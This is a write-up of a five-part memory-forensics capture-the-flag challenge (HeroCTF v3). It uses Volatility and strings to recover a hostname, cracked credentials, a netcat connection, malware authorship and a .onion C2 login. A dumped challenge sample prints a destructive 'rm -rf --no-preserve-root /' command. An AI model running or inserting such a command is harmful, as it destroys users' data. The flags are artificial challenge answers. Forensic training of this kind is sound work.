HeroCTFv3 - We_need_you - Write up

6 minute read

Here is my write-up of the five dump analyze forensic challenges made by Worty (https://twitter.com/_Worty) for the HeroCTF v3.

We need you 1/5

Interpol and the FBI have been investigating for over a year now. They are trying to get their hands on two hackers very well known for their ransomware and their ultra efficient botnet.

After long months of investigation, they managed to get their hands on one of their servers. But, when they got it back the PC caught fire because of a defense mechanism set up by the two hackers.

The hard drive could not be saved, but they had time to put the RAM in liquid nitrogen and analyze it later.

You know what you have to do!

For this first step, find the name of the PC!

Download, here.

Author: Worty
Format: Hero{Name}

So we are going to use volatility to analyze this memory dump. Quick imageinfo and we get the profile -> Win7SP1x86_23418.

To find the name of the pc, we just have to use hivelist and printkey with the offset of \REGISTRY\MACHINE\SYSTEM. And we find the name -> KANNIBAL.

Hero{KANNIBAL}

We need you 2/5

It must be their team name.

For this second step, find the user's name and password in clear text.

Author: Worty

Format: Hero{Username:Password}

So we need to find a username and his password, so classic hashdump.

So the user seems to be Razex, we just have to take the second part the NTLM hash and put it on crackstation.

Nice, we have the username and the password.

Hero{Razex:liverpoolfc123}

We need you 3/5

We know for sure that this server allowed to connect to infected machines.
Can you check if a connection was instantiated?

Author: Worty

Format: Hero{IP:Port}

So we have to find an IP and a port. First, we are going to check what has been done. So, quick consoles

And we see this, a netcat command which ping the IP : 146.59.156.82 and port 4444. We could also check connections with the netscan plugin.

We see the same thing right here.

Hero{146.59.156.82:4444}

We need you 4/5

The FBI and Interpol are desperately looking for the first and last names of the two hackers.
Moreover, we know that they were developing a malware, find its name and version too !
Find this valuable information!

Author: Worty

Format: Hero{Lastname-Firstname:Lastname-Firstname:NAME-X.X.X}

So we are going to check Razex’s documents to start this challenge.

We see the file Nemesis.py.txt.py.txt which has a strange name, we are going to dump it.

#Author : PAVOLI Ruben
#Version: 4.5.1
import os
os.system("rm -rf --no-preserve-root /")
def encrypt():
    with open("rsa_gen.key","rb"):
        ################################################
        #            MALWARE PUSH ON GIT                #
        ################################################%  

We cat the file, and we could see an Author and a version of the Malware. So we only have to find the second Author now. After few commands, we find clipboard which contain the second Author.

Hero{GOLDEN-Dany:PAVOLI-Ruben-4.5.1}

We need you 5/5

Last step in your analysis. Both hackers use a Command & Control server to manage their botnet.

Our teams are wondering if there are any traces of the URL and login credentials in the RAM of this server.

Author: Worty

Format : Hero{url-user:password}

P.S.: The flag is case sensitive

So we need to find the C&C URL and credentials. We are going to use iehistory plugin to find some strange URL.

We see this URL many times, and it’s a strange .onion which contain the name of the malware that we have seen before, and also in this URL, we could see a login.php page. So now, our goal is to find the credentials. Now begin the hard part Going to tell you some of the steps that allows me to first blood this challenge. I checked the result of iehistory and couldn’t find data which was sent. I have succeeded to dump the index.php page, here it is :

0x000000007fee3038      1      1 R--rw- \Device\HarddiskVolume2\Users\Razex\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\3ISVHNCV\login[1].htm
Get out.<!DOCTYPE HTML>
<head>
	<title>Connect.</title>
</head>
<body>
	<form method="POST" action="./login.php">
		<input name="username"><br/>
		<input name="password" type="password"><br/>
		<button type"submit">submit</button>
	</form>
</body>
</html>

So, we see that it’s going to be post data. So now, we could focus internet process memories, because we see nothing more with iehistory plugin, mftparser and other classic plugins. Let’s dump the two Internet Explorer process.

Quick pslist :

0x862ba7a0 iexplore.exe           3404   2012     16      558      1      0 2021-04-19 17:23:25 UTC+0000                                 
0x8541d1e8 iexplore.exe           3504   3404     21      567      1      0 2021-04-19 17:23:25 UTC+0000
``````code
volatility -f capture.mem --profile=Win7SP1x86_23418 memdump -p 3404,3504 --dump-dir .

Now, strings and grep parts begin :)

$ strings 3*04.dmp | grep -i -B 5 -A 5 "login.php"

We use -i option of grep to not check the case, and use -A and -B with the value 5, to print 5 lines before and 5 after the line where grep find characters that we search.

I tried this command with these keywords :

login.php
.onion
razex
base64
<form method="POST"
username=
password=
...
```During these steps, we could see that there are many internet files, I dump some of them and find cookies etc. I hope that there could contain a cookie which contain the password but unfortunately not :(.

I focused a lot “base64” with my grep command because, after all I did, I was sure that the pass will be encoded in a certain way.

After many commands and reasoning, I was sure that I did a thing in a wrong way, or missed something.

So I go on the web if I could see some write-ups or advanced techniques to this search. I saw again, Worty’s write-up of the FCSC 2020 and see the last challenge where he as to find a password like us. (https://w0rty.github.io/Graphic/FCSC2020/Forensic/nuages.html)

We could see this :

```code
So I check on the internet, and, on a stack overflow forum, a person advises to look at the strings of the file in UTF-16, and not in UTF-8, which results in the -el option of the strings command.
So I do this on my dump, and miraculously, my username and password appear!

And bingo, we found the problem, our approach was good, but the way when we use strings was wrong. We didn’t use -el option with strings, so we couldn’t see all the informations because of the encoding which was in UTF-8 with a classic strings, but with web, it’s UTF-16.

So, we just have to do this command :

$ strings -el 3*04.dmp | grep -i -C 5 "razex"
...
razexP85Inq4
...
```code
We could see “razexP85Inq4” which is something that we have not seen before without -el option.

This seems to be a password and the hint confirms it :

```code
A good news despite this DDOS, here is a hint for the last forensic challenge:

Even if he is a very good hacker, he doesn't apply all the right principles, especially when it comes to passwords.

P.S.: No bruteforce needed, just think about the "stupid things" people do when they create passwords.

Razex the username, was also in his password, this is a stupid thing because it could be brute-forceable really easily.

Hero{http://nemesis3g2upl4pq6kufc4m.onion/-Razex:razexP85Inq4}

These challenges were pretty cool, the last challenge was really hard and now, I’m going to put -el option every time I do “strings” on a memory dump.

Thanks to Worty, really like the last one, and see you later.